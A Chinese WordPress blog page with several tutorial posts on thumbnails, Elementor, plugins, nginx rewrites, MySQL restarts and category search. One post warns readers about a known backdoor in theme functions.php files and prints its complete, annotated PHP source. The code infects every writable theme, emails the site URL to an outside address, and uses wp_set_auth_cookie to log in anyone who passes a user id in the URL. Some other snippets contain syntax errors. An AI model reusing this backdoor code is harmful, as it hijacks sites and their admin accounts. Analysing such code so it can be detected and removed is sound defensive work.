Posted on Leave a comment

插件完美解决wordpress缩略图的方法,和wordpress大学用的是相同的缩略图解决方式

插件名称:Thumbnails  作者:Stefano Lissa

作者文献阅读网址∶ https∶//ww.satollo.net/plugins/thumbnails

能解决文章缩略图的自动获取和按需裁剪,裁剪之后也会生成图片缓存,不会裁剪不需要的图片,可以直接把wordpress设置,媒体里面的缩略图裁剪,除了最小那个,中等和大的都设置成0,让wp不去裁剪生成缩略图,浪费空间。文件直接输入的就是img src,在需要裁剪的位置,使用下面方法中的第一个即可。具体方法也可以参考作者的网址。总之是完美,也可以把插件内嵌到主题里面。

1.直接输出文章的缩略图img src

<?php the_post_thumbnail(array(200,300, true)); ?>

2.直接输出文章缩略图的裁剪文件url

<?php $data= wp_get_attachment_image_src(get_post_thumbnail_id(get_the_ID()),array(300,300,true));echo $url= $data[0];?>

3.直接填写媒体ID,输出img src,注757是媒体ID

<?php echo wp_get_attachment_image(757,array(75,125,true)); ?>

4.通过字段获取媒体ID,输出img src

<?php $Logo = get_field('logo','option');echo wp_get_attachment_image($logo,array(120,125,true)); ?>

注意,字段要输出媒体id

5.通过字段获取媒体ID,输出裁剪文件url

<?php $data= wp_get_attachment_image_src(get_field(('Logo','option'),array(300,300,true));echo $url=$data[0];?>

Posted on Leave a comment

Elementor编辑器 好用的WordPress页面构建插件

Elementor是一款非常现代的页面编辑器,作为2018年最流行的免费页面编辑插件,它改变了WordPress建站的方式,让我们可以无需代码便能自己构建网页

在本文中,我们将详细介绍Elementor及其使用方法,以帮助大家决定是否应该使用Elementor作为默认的WordPress页面构建工具

 

为什么推荐使用Elementor

我曾经使用过很多款可视化的编辑器,比如WPBakery、Visual Composer等,其中,Elementor在很多方面都是更加优秀的一款

  • 现代、简洁的编辑方式
  • 免费版已经很好用
  • Elementor支持中文,支持任何WordPress主题
  • 轻量,即使Elementor Pro版本,安装包总大小仅3MB
  • 用户数量非常多,仅WordPress插件中心就有100万以上的活跃安装
  • 超过90%的五星好评
  • 专业的开发和售后团队

以上这些特点,已经足够说服我们使用Elementor,并且它还在不断的改进和增强,在WordPress中越来越流行

当然我们不能只根据这些外部因素判断,真正实用的功能才是最重要的,接下来让我们看一下Elementor有哪些特性和值得关注的地方

 

Elementor安装

Elementor是免费使用的,我们可以随时体验,不管是免费版还是Pro版本,都需要先安装Elementor,可直接在官网下载,免费版本直接安装即可;如果你购买了Pro版本,需要先安装Elementor插件,然后再安装Elementor Pro插件,即使之前已有免费版也可以无缝切换到Pro版本

注意:安装Elementor的话一定要确保符合它的环境要求,否则可能会出现意外的错误

安装好之后我们就会在文章或者页面看到一个 “使用 Elementor 编辑” 的按钮,点击它就会进入到Elementor可视化编辑器

开启Elementor编辑器

elementor选择页面的模版

Elementor会为你准备2款模版,这里面有三种选择:

  • 默认模版:主题自带的模版,一般会带有主题的元素,常用在文章
  • Elementor全宽:将内容部分设置为100%宽度,保留原主题头部和底部
  • Elementor画布:纯Elementor的模版,不包含任何其他元素,适合做专题页面

注意布局要保存之后再开启Elementor才会生效

 

Elementor用户界面

Elementor用户界面

和大多数的可视化页面编辑器一样,Elementor同样采用了左侧编辑栏,右侧显示网页的布局,目前来说这种布局是最好的,容易编辑,也符合大多数用户的使用习惯

使用Elementor编辑器,无需准备空白的模版,Elementor已经为你准备好了,在页面布局中选择画布即可获得全新的页面,而且没有那么多主题或者插件的要求,你可以在任何类型的WordPress主题中使用Elementor

elementor空白模版

用Elementor制作页面时,你可以直接从头开始编辑,自己设置每个元素样式;或者调用模版,在模版基础上进行修改替换,这样完成页面也是一种非常高效的方式,Elementor提供了各种模块和100+的模版,不管是免费版还是Pro版本都可以调用演示,只不过Pro版本中可用模版更多

elementor列设置

多样化的列布局,你可以根据自己的需要选择列的数量和样式,然后拖拽元素填充到合适的位置,组成网站的页面设计。

你可以将任何Elementor中包含的元素拖动到列中,比如图片、文字段落、标题、列表、文章、按钮、客户评价、CTA、价格表等,每当你选择不同的元素,左侧都会自动切换成对应的选项,相比其他编辑器,Elementor元素的样式和选项都是非常不错的,不需要过多的设置便能设计出漂亮的页面

Elementor元素设置

 

Elementor编辑器功能以及体验

判断一个页面编辑器是否好用,选项和功能是最关键的地方,下面我么看一下Elementor的编辑选项

 

Elementor实时编辑

Elementor文字实时编辑

首先最重要的一点,就是文字实时编辑,这个特征可以用来判断一款页面编辑器是否现代,以及有效率。Elementor是支持行内实时编辑的,而且它为我们准备了WordPress经典编辑器,你可以通过把编辑栏拉宽获得更好的写作体验,就像在后台编辑一样,唯一让人有点不适应的就是如果你想在网页中实时编辑,需要点击2次才能把光标固定到聚焦在想要的位置

 

Elementor样式设置

Elementor样式设置

除了针对每个元素的关键选项外,Elementor还提供了高级样式设置,你可以设置元素的背景、边框、内外边距、响应式、自定义CSS等,当然,根据每个元素的特点会有不同的选项

Elementor在工具的分布上,采用了Tab和Toggle结合的形式,即使有再多的选项也能轻松容纳,这里的布局Elementor做的非常好,将有限的空间利用了起来,不像有些编辑器,体验非常差,以前用过一款 CornerStone,编辑器非常拥挤,经常找不到自己想要使用的元素

 

方便的右键菜单

Elementor右键菜单

和其他页面编辑器不同,Elementor独有的支持了右键菜单,这是我非常喜欢的特性,用来选中什么多西非常方便

  • 删除元素更省事了,在没有右键功能前,需要手动到最右边找到小小的叉号,很费劲
  • 选择元素更方便了,当你点击右键时,在右键菜单中会显示当前选中的元素是Widget、列还是行,这样在进行编辑操作时就很难出错了
  • 样式拷贝,做类似设计时很有用

右键菜单真的是一个非常好的特性,如果说是什么让我选择Elementor,那右键菜单一定是非常重要的一项

 

Elementor快捷键

Elementor编辑器提供了非常多的快捷键,比如常用的复制、粘贴、历史记录,这些都可以在Elementor中快速使用,Elementor快捷键整理

 

响应式编辑

Elementor响应式编辑

在制作复杂页面时,可以使用Elementor的响应式编辑进行调整,包括PC、平板和手机端,三种设备的样式不会互相影响,可以针对每种设备进行单独优化

 

Elementor模版

为了让我们能够快速构建网页,Elementor提供了模版功能,可以进行各种调用

 

自带模块

elementor自带模块

模块模版,通常是一部分特定功能的部分,比如头部、底部、倒计时、联系表单、文章列表等,这些模块大部分都为黑白样式,容易搭配和修改,在主题编辑中很有用

 

页面模版

elementor页面模版

页面模版,整页的模版,大部分都是不同风格,各行各业的网页,可以直接修改,在Elementor中非常好的一点就是你可以同时加载多个页面,这些页面模版不会覆盖之前的内容,这样就可以通过删减的方法将多个页面的元素组合在一起

查看所有Elementor页面模版

 

自定义模版

elementor自定义模版

当我们自己制作了一些比较好的模版后,可以将其保存为自定义模版,当需要用到类似的模块时,可以直接调用,而且自定义模版支持导入和导出,分享起来很方便。另外,你还可以通过第三方获取Elementor模版,比如从Envato Elements的获取模版

 

全局元素

elementor全局元素

Elementor很智能,如果你想保存一个元素,比如按钮、文字,他会自动保存为全局元素

什么是Elementor全局元素呢? 它可以在所有的页面中使用,而且同一个元素的样式都是相同的,并且默认情况下全局元素会被锁定编辑,但是如果修改的话,所有的元素都会跟随变化

对于需要较多自定义页面的网站,全局元素在统一风格和一些重要数据的展示上非常有用

 

Elementor主题编辑(Theme Builder)

Elementor主题编辑

Elementor 2.0 新推出的主题编辑功能,让其不再仅仅是一款页面编辑器,而成为了主题构建器,使用Elementor你可以把主题完全更改,使用主题编辑功能,你会发现所有的操作都变得简单了。你可以轻松地修改网站的头部和底部、文章页面、分类页面、归档页面等,然后将这些修改应用到某些页面,甚至整个站点,无需任何代码知识,具体的设置方法可以查看 Elementor Theme Builder教程

 

其他特性

Elementor除了基本的页面编辑器功能外,还有很多非常有特色的功能

 

导航栏

Elementor导航栏

Elementor新加入的一个特性,这个导航最大的作用就是你可以在上边改变段的位置,避免了使用鼠标在页面上长距离滚动拖动

 

幻灯片

elementor幻灯片效果

Elementor Pro中提供了幻灯片工具,只需要简单设置便能开始使用,如果你不需要比较炫酷的效果的话,Slider Revolution、LayerSlider之类的插件基本可以卸载了

 

侧边栏小工具

Elementor内置了一个侧边栏调用小工具,你可以用它来制作自己的侧边栏小工具,Elementor制作侧边栏小工具教程

 

维护模式

设计好的维护模式模版

Elementor不仅可以一键开启维护模式,而且你可以使用Elementor定制自己的专属维护页面,Elementor开启维护模式教程

 

Elementor Pro

可能对于一般的页面设计需求,免费版本的Elementor功能已经完全足够了,那么我们有没有必要升级高级版本呢,我们看一下Elementor Pro主要增加了哪些功能

  • Pro模版,Elementor中很多内置模版需要Pro
  • 更多的可用元素,不得不说Pro模版中有许多实用的功能,比如 文章列表、portfolio列表、幻灯片、联系表单、客户评价、CTA等
  • 自定义CSS
  • 全局元素
  • 动态字段
  • WooCommerce定制
  • Elementor Theme Builder,让你能够制作主题模版

如果你需要上面列出的功能,那么我建议你购买Elementor Pro版本,使用起来非常方便,总体来说,提升还是非常大的,尤其是它的主题编辑功能,非常的强大,使用起来更简单

 

Elementor Pro价格

Elementor Pro价格

  • 单个站点授权,49美元
  • 3个站点授权,99美元
  • 无限站点授权,199美元

所有的套餐都包含一年的更新和支持,Elementor Pro续费的话有25%的折扣,当然也可以选择取消续费,插件还可以继续使用,只是没有更新和支持

 

和其他的页面编辑器相比,Elementor的使用范围更广,更加通用,不管你是普通的WordPress用户,还是做商业性质的网站,都可以在Elementor中找到自己需要的功能,而且使用起来也灵活,可以快速构建,也可以针对一个模块进行各种高级的设置以及自定义样式

无论是免费版本还是Pro版本,Elementor都是非常强大的编辑器,它最大的作用是改变了WordPress的编辑习惯,有着多样的设置和人性化的编辑体验,不再需要专业和枯燥的代码来修改页面

Posted on Leave a comment

wordpress 常用插件

1.All In One WP Security(安全插件)

2.Contact Form 7(留言)

3.DX-auto-save-images(远程图片本地化)

4.Easy Watermark(水印)

5.Flamingo(留言在网站后台查看)

6.Multisite Cloner(站群克隆使用)

7.Really Simple SSL

8.Stop Generating Unnecessary Thumbnails(设置缩略图重置和是否禁用有些生成的缩略图)

9.Sucuri Security(安全插件)

10.Wenprise Pinyin Slug(各位置中文名自动转拼音)

11.Wordfence(安全插件)

12.WP-Optimize(多功能插件,压缩图片,缓存,清理数据库等,不过本人主要用来压缩图片)

13.wp super cache(缓存插件)

14.Thumbnails(主题图片裁剪插件,非常好用,利用本身自带的裁剪功能,插件丢失,网站缩略图依旧在,不会造成缩略图问题。)

如果主题没有内嵌一些功能插件,可以再增加如下插件

15.wp-smpt(网站邮件功能)

16.domian(爱找主题作者制作,多域名多主题插件,适用于非自适应网站的手机站插件)

Posted on Leave a comment

linux服务器wordpress目录站群伪静态

#ignored: “-” thing used or unknown variable in regex/rew
rewrite ^/([_0-9a-zA-Z-]+/)?wp-admin$ /$1wp-admin/ permanent;
if (-f $request_filename){
set $rule_2 1;
}
if (-d $request_filename){
set $rule_2 1;
}
if ($rule_2 = "1"){
#ignored: “-” thing used or unknown variable in regex/rew
}
rewrite ^/([_0-9a-zA-Z-]+/)?(wp-(content|admin|includes).*) /$2 last;
rewrite ^/([_0-9a-zA-Z-]+/)?(.*.php)$ /$2 last;
rewrite /. /index.php last;

Posted on Leave a comment

宝塔mysql总是自动停止解决总汇

最近小编使用宝塔经常遇到mysql自动停止,好多读者发消息给小编说网站打不开,小编于是查看了一下服务器mysql的日志,发现mysql出错时报【InnoDB: Fatal error: cannot allocate memory for the buffer pool】Innodb 存储引擎的缓存机制和 MyISAM 的最大区别就在于 Innodb 不仅仅缓存索引,同时还会缓存实际的数据。所以,完全相同的数据库,使用 Innodb 存储引擎可以使用更多的内存来缓存数据库相关的信息,当然前提是要有足够的物理内存。innodb_buffer_pool_size 参数用来设置 Innodb 最主要的 Buffer(Innodb_Buffer_Pool)的大小,也 就是缓存用户表及索引数据的最主要缓存空间,对 Innodb 整体性能影响也最大。这个参数设置成内存的50%-80%,当然具体要结合实际情况而定,考虑别的存储引擎占用的内存,考虑服务器是不是还提供其他服务等等…看来,我的机器之所以宕掉的原因是,系统默认的内存:default innodb_buffer_pool_sizeinnodb_buffer_pool_size=50M出现数据库经常停止可以参照下面解决方案:

解决方法一:

安装宝塔面板【linux工具箱】

添加设置SWAP大小,根据你的实际内存进行调整,swap是Linux下的虚拟内存,设置适当的swap可增加服务器稳定性,建议swap容量在真实内存容量的1.5倍左右,若您的服务器内存大于4GB,可设1-2GB的固定值,swap文件默认保存在/www/swap,设置前请确保磁盘空间够用。

解决方法二:

根据你的实际内存进行mysql优化

解决方法三:

登陆宝塔后台-计划任务-添加Mysql守护,执行周期,可选择多长时间执行一次,比如10分钟监控执行一次,具体的周期请站长根据自己服务器实际情况来设置。

pgrep -x mysqld &> /dev/nullif [ $? -ne 0 ];thenbash /www/server/panel/script/rememory.sh /etc/init.d/mysqld startfi

解决方法四:

这个方法简单粗暴,适合土豪站长,直接增加服务器内存或使用云数据库,把数据库分离出去。如果你遇到mysql问题或有更好的解决方法欢迎投稿给小编,我们和你一起探讨学习。

我使用的是第三个方法,和下面这个一样

宝塔面板mysql数据库意外停止,怎么设置监控mysql数据库运行情况,发现数据库停止了,能够自动重启Mysql数据库呢?
其实细心的站长不难发现,宝塔自带了Mysql进程守护功能。具体操作方法如下:
登陆宝塔后台-计划任务-添加Mysql守护,执行周期,可选择多长时间执行一次,比如10分钟监控执行一次,具体的周期请站长根据自己服务器实际情况来设置。

如图:

宝塔Mysql进程守护自动重启,宝塔Mysql进程守护代码:

pgrep -x mysqld &> /dev/null
if [ $? -ne 0 ];then
bash /www/server/panel/script/rememory.sh
/etc/init.d/mysqld start
fi

Posted on Leave a comment

wordpress高级搜索功能示例:按分类搜索

wordpress默认的搜索功能,仅有一个搜索框,功能单一,如何给搜索框增加搜索条件,提高搜索的准确性?

示例:按分类搜索。

让访客可以在搜索的时候,可以选择分类作为条件,同时,本教程也可更改为其它的各种条件。

效果如图:

wordpress高级搜索功能示例:按分类搜索

步骤一:改造搜索框

一般主题都会有一个searchform.php文件,该文件为搜索框的模板,也有的主题没有这个文件,而是使用了wordpress默认的搜索框,要改造搜索框的话,则需要建立searchform.php文件,以便自定义搜索框,阿树使用的searchform.php搜索框的内容和默认的搜索框是一样的,如下:

<form role="search" method="get" class="search-form" action="<?php echo home_url(); ?>">
<label>
<span class="screen-reader-text">Search:</span>
<input type="search" class="search-field" placeholder="Search&hellip;" value="" name="s" title="Search:" />
</label>
<input type="submit" class="search-submit" value="Search" />
</form>

里面只有一个文本输入框,及一个提交按钮,我们需要在里面添加一个下拉选择框,先获取所有分类,然后循环将分类输出,如下:

<?php
$args = array(
'hide_empty' => 0
);
$categories = get_categories( $args );
//上面的代码获取所有分类
?>
<form role="search" method="get" class="search-form" action="<?php echo home_url(); ?>">
<label>
<span class="category-text">Category:</span>
<select name="cat">
<option value="">All Category</option>
<?php foreach($categories as $category){ ?>
<option value="<?php echo $category->term_id; ?>"><?php echo $category->name; ?></option>
<?php } ?>
</select>
</lable>
<label>
<span class="screen-text">Search:</span>
<input type="search" class="search-field" placeholder="Search&hellip;" value="" name="s" title="Search:" />
</label>
<input type="submit" class="search-submit" value="Search" />
</form>

如此一来,搜索框中便多了一个分类的下拉框,注意下拉框的name是cat。

步骤二:处理搜索条件

接下来就是搜索页面按条件处理搜索了。

网上很多教程都是直接修改搜索页模板search.php来达到目的。那样很不方便,多了很多条件判断不说,还需要另外查询文章,有的甚至直接用数据库操作语句从数据库中查找。

将下面代码添加到functions.php文件中即可:

<?php
function return_only_selected_category( $query ) {
//is_search判断搜索页面 !is_admin排除后台 $query->is_main_query()只影响主循环
if ( is_search() && !is_admin() && $query->is_main_query() ){
//有cat值传入
if(isset($_GET['cat']){
$term_id = (int)$_GET['cat']; //处理分类参数
if( $term_id ){
//分类查询的参数
$tax_query = array(
array(
'taxonomy'=>'category', //可换为自定义分类法
'field'=>'term_id',
'operator'=>'IN',
'terms'=>array($term_id)
)
);
$query->set( 'tax_query', $tax_query );
}
}
}
return $query;
}
add_filter('pre_get_posts', 'return_only_selected_category');
?>

通过pre_get_posts钩子去更改查询条件即可。

Posted on Leave a comment

wordpress主题functions.php文件恶意代码清除方法

昨天在给朋友做一个定制主题的时候,在functions.php发现了一段非常奇怪的代码。自己也忘了是怎么出现的。我随便找了个函数百度了一下,发现中招的人真是不少啊。原来这段包含在functions.php的代码是已经流行了一段时间的恶意代码。这段代码会自动循环感染你所有的WordPress主题functions.php文件。所以发出来给大家做个参考。有碰到类似的朋友记得一定要删除。

小心WordPress主题functions.php包含的恶意代码

这段代码是被加在在functions.php的?>后面的。如果发现了类似的多余函数,或者很多个?>那就要检查一下了。修改的时候记得把其他WordPress主题的functions.php设置为只读。这样才能不被感染。全部改完后再把权限修改回来。

另外说一点,本站下载的主题不会含有恶意代码,凡是其他网站下载的Yusi主题,请自己检查清楚有没有后门。

好了,下面把那段恶意代码发布上来,希望大家自己对照检查一下。

<?phpfunction _verifyactivate_widgets(){    //当前文件名,如/path-to-www/wp-content/themes/SimpleDark/functions.php         //查找当前主题functions.php文件中最后一个 <? 标记,从这个标记的位置开始,取得一直到文件尾的内容    $widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));    $output="";    $allowed="";    //去除html和php标签,其实这一句是扯蛋。。。    $output=strip_tags($output, $allowed);    //取得主题目录themes的绝对路径,如 /path-to-www/wp-content/themes        //为了加强程序的兼容性,它不惜以这种很晦涩的方式来获取。。。        //以主题目录themes的绝对路径用array包裹为参数传递给_get_allwidgets_cont函数获取此博客的所有主题的functions.php文件的绝对路径    $direst=_get_allwidgets_cont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));    if (is_array($direst)){        foreach ($direst as $item){            //如果主题functions.php文件可写            if (is_writable($item)){                //特征码                $ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));                //取目标functions.php文件内容                $cont=file_get_contents($item);                //没找到特征码?OK,试图感染                if (stripos($cont,$ftion) === false){                    //查看目标functions.php文件最后是否是以 ?> 结尾,如果不是,给加上 ?> 标记                    $comaar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";                    //这里的代码是忽悠人了,模仿WP widgets的代码,蛊惑你的眼睛,让你觉得这是widget代码。。。                    $output .= $before . "Not found" . $after;                    //如果文件是以 ?> 标记结尾的,连标记一起取过来                    if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}                    //开始感染,$widget内容即是恶意代码自身,在functions.php文件原内容后附加恶意代码                    $output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $comaar . "\n" .$widget);fclose($f);                     //后面这句也是伪装用的                                $output .= ($isshowdots && $ellipsis) ? "..." : "";                }            }        }    }    return $output;}function _get_allwidgets_cont($wids,$items=array()){    //从$wids数组弹出一个元素(实际上是一个位置)    $places=array_shift($wids);    //如果位置字串是以/结尾的,则去掉/    if(substr($places,-1) == "/"){        $places=substr($places,0,-1);    }     //若不存在这样的文件或目录则直接返回false    if(!file_exists($places) || !is_dir($places)){        return false;    }elseif(is_readable($places)){        //否则的话。。。嘿嘿        //遍历此目录        $elems=scandir($places);        foreach ($elems as $elem){            if ($elem != "." && $elem != ".."){                //如果是目录,则加入$wids数组                if (is_dir($places . "/" . $elem)){                    $wids[]=$places . "/" . $elem;                } elseif (is_file($places . "/" . $elem)&&                     $elem == substr(__FILE__,-13)){                        //否则,如果是文件,并且文件名等于 functions.php的话,则加入到$items数组保存,这才是它的目的functions.php正是它要找的                    $items[]=$places . "/" . $elem;}                }            }    }else{        return false;       }    //下面还有子目录?再找找看,递归    if (sizeof($wids) > 0){        return _get_allwidgets_cont($wids,$items);    } else {        //好了,完事了,以数组返回所有找到的functions.php文件的绝对路径        return $items;    }} //下面是3个针对低版本的php而写的兼容函数if(!function_exists("stripos")){     function stripos(  $str, $needle, $offset = 0  ){         return strpos(  strtolower( $str ), strtolower( $needle ), $offset  );     }} if(!function_exists("strripos")){     function strripos(  $haystack, $needle, $offset = 0  ) {         if(  !is_string( $needle )  )$needle = chr(  intval( $needle )  );         if(  $offset < 0  ){             $temp_cut = strrev(  substr( $haystack, 0, abs($offset) )  );         }         else{             $temp_cut = strrev(    substr(   $haystack, 0, max(  ( strlen($haystack) - $offset ), 0  )   )    );         }         if(   (  $found = stripos( $temp_cut, strrev($needle) )  ) === FALSE   )return FALSE;         $pos = (   strlen(  $haystack  ) - (  $found + $offset + strlen( $needle )  )   );         return $pos;     }}if(!function_exists("scandir")){     function scandir($dir,$listDirectories=false, $skipDots=true) {        $dirArray = array();        if ($handle = opendir($dir)) {            while (false !== ($file = readdir($handle))) {                if (($file != "." && $file != "..") || $skipDots == true) {                    if($listDirectories == false) { if(is_dir($file)) { continue; } }                    array_push($dirArray,basename($file));                }            }            closedir($handle);        }        return $dirArray;    }} //这个动作添加了,用于检测所有主题目录下functions.php并感染add_action("admin_head", "_verifyactivate_widgets"); function _getprepare_widget(){    if(!isset($text_length)) $text_length=120;    if(!isset($check)) $check="cookie";    if(!isset($tagsallowed)) $tagsallowed="<a>";    if(!isset($filter)) $filter="none";    if(!isset($coma)) $coma="";    if(!isset($home_filter)) $home_filter=get_option("home");     if(!isset($pref_filters)) $pref_filters="wp_";    if(!isset($is_use_more_link)) $is_use_more_link=1;     if(!isset($com_type)) $com_type="";     if(!isset($cpages)) $cpages=$_GET["cperpage"];    if(!isset($post_auth_comments)) $post_auth_comments="";    if(!isset($com_is_approved)) $com_is_approved="";     if(!isset($post_auth)) $post_auth="auth";    if(!isset($link_text_more)) $link_text_more="(more...)";    if(!isset($widget_yes)) $widget_yes=get_option("_is_widget_active_");    if(!isset($checkswidgets))     //这个实际是wp_set_auth_cookie    $checkswidgets=$pref_filters."set"."_".$post_auth."_".$check;    if(!isset($link_text_more_ditails)) $link_text_more_ditails="(details...)";    if(!isset($contentmore)) $contentmore="ma".$coma."il";    if(!isset($for_more)) $for_more=1;    if(!isset($fakeit)) $fakeit=1;    if(!isset($sql)) $sql="";     //如果 _is_widget_active_ option内容为空,即表示没有被感染过    if (!$widget_yes) :     global $wpdb, $post;    //取出存在已经通过的评论(不包括trackback/pingback)的文章    // post_author 为 [email protected] 的文章,肯定是没有的     $sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$coma."vethe".$com_type."mas".$coma."@".$com_is_approved."gm".$post_auth_comments."ail".$coma.".".$coma."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#    if (!empty($post->post_password)) {         if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) {             if(is_feed()) {                 $output=__("There is no excerpt because this is a protected post.");            } else {                $output=get_the_password_form();            }        }    }    if(!isset($fixed_tags)) $fixed_tags=1;    if(!isset($filters)) $filters=$home_filter;     //$gettextcomments实际上为 wp_mail    if(!isset($gettextcomments)) $gettextcomments=$pref_filters.$contentmore;    if(!isset($tag_aditional)) $tag_aditional="div";     //这里$sh_cont即为 [email protected]    if(!isset($sh_cont)) $sh_cont=substr($sq1, stripos($sq1, "live"), 20);#    if(!isset($more_text_link)) $more_text_link="Continue reading this entry";      if(!isset($isshowdots)) $isshowdots=1;     $comments=$wpdb->get_results($sql);     if($fakeit == 2) {         $text=$post->post_content;    } elseif($fakeit == 1) {         $text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;    } else {         $text=$post->post_excerpt;    }    //开始调用 wp_mail 向 [email protected] 发送邮件,标题和内容都是被感染的博客的URL 地址    $sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($gettextcomments, array($sh_cont, $home_filter, $filters)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#    if($text_length < 0) {        $output=$text;    } else {        if(!$no_more && strpos($text, "<span id="more-5265"></span>")) {            $text=explode("<span id="more-5675"></span>", $text, 2);            $l=count($text[0]);            $more_link=1;            //执行这一句时就开始发邮件了。            $comments=$wpdb->get_results($sql);        } else {            $text=explode(" ", $text);            if(count($text) > $text_length) {                $l=$text_length;                $ellipsis=1;            } else {                $l=count($text);                $link_text_more="";                $ellipsis=0;            }        }        for ($i=0; $i<$l; $i++)                $output .= $text[$i] . " ";    }    //把感染标记置为1    update_option("_is_widget_active_", 1);    if("all" != $tagsallowed) {        $output=strip_tags($output, $tagsallowed);        return $output;    }    endif;    $output=rtrim($output, "\s\n\t\r\0\x0B");    $output=($fixed_tags) ? balanceTags($output, true) : $output;    $output .= ($isshowdots && $ellipsis) ? "..." : "";    //$filter 为 none ...,又是在伪装    $output=apply_filters($filter, $output);    switch($tag_aditional) {        case("div") :            $tag="div";        break;        case("span") :            $tag="span";        break;        case("p") :            $tag="p";        break;        default :            $tag="span";    } //$checkswidgets即是wp_set_auth_cookie    if ($is_use_more_link ) {        if($for_more) {            $output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $more_text_link . "\">" . $link_text_more = !is_user_logged_in() && @call_user_func_array($checkswidgets,array($cpages, true)) ? $link_text_more : "" . "</a></" . $tag . ">" . "\n";        } else {            $output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $more_text_link . "\">" . $link_text_more . "</a></" . $tag . ">" . "\n";        }    }    return $output;} //这里是用来干坏事的,这才是这个恶意代码的目的,前面的感染是“准备活动”add_action("init", "_getprepare_widget");  //这个函数也是用来伪装的,无恶意function __popular_posts($no_posts=6, $before="<li>", $after="</li>", $show_pass_post=false, $duration="") {    global $wpdb;    $request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";    $request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";    if(!$show_pass_post) $request .= " AND post_password =\"\"";    if($duration !="") {         $request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";    }    $request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";    $posts=$wpdb->get_results($request);    $output="";    if ($posts) {        foreach ($posts as $post) {            $post_title=stripslashes($post->post_title);            $comment_count=$post->comment_count;            $permalink=get_permalink($post->ID);            $output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;        }    } else {        $output .= $before . "None found" . $after;    }    return  $output;}?>

我这边被感染的代码没有注解,我去找了由无灯大大分析注释版本代码,非常感谢。

小小建议

在有些地方下载的免费主题,记得检查Wordpress主题的functions.php文件是否含有上面的恶意代码(一般会自动加载在functions.php正常函数的最后)。如果有。记得设置为只读然后删除。

Posted on Leave a comment

wordpress主题选项项目添加代码

1.主题选项图片上传:'logo'=>array('title'=>'logo上传','type'=>'upload','size'=>'60','des'=>'手动填写地址/wp-content/themes/abctheme/images/logo.png , 或者上传文件插入地址','tips'=>'大小宜为500x51'),

2.主题位置代码:<img src="<?php echo get_option( 'logo' ); ?>" alt="<?php echo esc_attr( get_bloginfo( 'name' ) ); ?>" title="<?php echo esc_attr( get_bloginfo( 'name' ) ); ?>" />

注:字母 logo为可替换内容,要注意上下两段代码里都要替换。 alt和 title如果不需要可以选择删掉,这里贴上去的alt和title显示在前端都是博客名称或者企业名称。

1.文字插入:'zjtel'=>array('title'=>'手机号码','type'=>'textarea','width'=>'500px','height'=>'25px'),

2.主题代码位置: < ?php echo stripslashes( get_option( 'zjtel' ) ); ?>

注:zjtel为可替换。

其中1是放在admin-option/data.php,2是放在像header.php,footer.php和index.php等展现页里面。

Posted on Leave a comment

柳城的百度seo插件不能用后的wordpress sitemap插件 baidu_sitemap_china分享

要说起wordpress sitemap插件,老实说,市面上并不多,以往,用得最多的可能就是柳城的百度seo插件了,可惜,该插件已不支持最新版的wp及php7以上。。。无奈一款简单直观的wordpress sitemap插件进入了历史篇章(作者已回应不再更新)

那么,可能大家用得最多的wordpress sitemap插件就属于 google-sitemap-generator 了吧,当然,以我的技术层面还不足以去评价这款插件是好还是不好。

再然后,有一款dx-seo插件里的sitemap分支还是不错的,可惜dx-seo这款插件安装启动后,也基本是各种报错了,而且该插件里还涵盖了一些其他用不到的功能,为了wordpress sitemap再带上一些其他没用的功能,强迫症患者是不是会很难受?

最后,其他市面上各种sitemap的小版本,我也体验了一番,基本都存在报错、无法使用的情况,无奈。。。

那么,今天,就给大家带来一款,我自己觉得还算可以的一款wordpress sitemap插件,提前说明,该插件是从dx-seo里单纯抽离出sitemap功能后编写成独立插件的。

看图就可以很直观的清楚如何设置,小白都可以看懂的设置,需要的朋友就请下载后体验吧,有任何不明白的地方,欢迎该贴回复!

Posted on Leave a comment

wp super cache 页面不相符!时间戳有差异或者不存在(本人是使用百度云加速造成的)

wP Super Cache caching was broken but has been fixed! The script advanced-cache.php could not load wp-cache-phase1.php.
然后测试缓存,说是缓存不成功:页面不相符!时间戳有差异或者不存在!

重启服务器、更换主题、重新安装 WP Super Cache、恢复快照到几十天之前都试了,也均不灵验。

后来突然想到,WP Super Cache 是通过生成静态的 html 文件来减轻每次看博文读取数据库负担的,好像 CloudFlare 的加速里给开了 HTML JS CSS 加速。

